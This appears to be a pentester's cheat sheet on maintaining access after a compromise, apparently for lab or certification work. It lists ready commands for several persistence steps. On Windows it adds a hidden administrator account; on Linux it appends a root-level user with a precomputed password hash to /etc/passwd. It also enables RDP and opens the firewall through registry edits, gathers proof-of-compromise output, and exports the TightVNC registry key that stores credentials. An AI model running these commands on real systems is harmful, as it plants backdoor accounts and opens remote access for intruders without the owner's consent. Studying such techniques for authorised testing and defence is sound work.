Notes - Maintaining Access
Create new user
// windows
# net user fm pass123 /add && net localgroup administrators fm /add
// linux
// Generate password hash
# openssl passwd -1 -salt fm pass123
// Add to /etc/passwd
# echo 'fm:$1$fm$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd
// If running a script
# echo 'echo "fm:\$1\$fm\$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash" >> /etc/passwd' > script.sh
Enable rdp
// powershell
# Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
# Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
// cmd
# reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Proof
- Collect proof of compromised
# hostname && id && cat proof.txt && ip a
# hostname && whoami && type proof.txt && ipconfig /all
TightVNC Reg
reg export “HKLM\Software\TightVNC\Server” foo.reg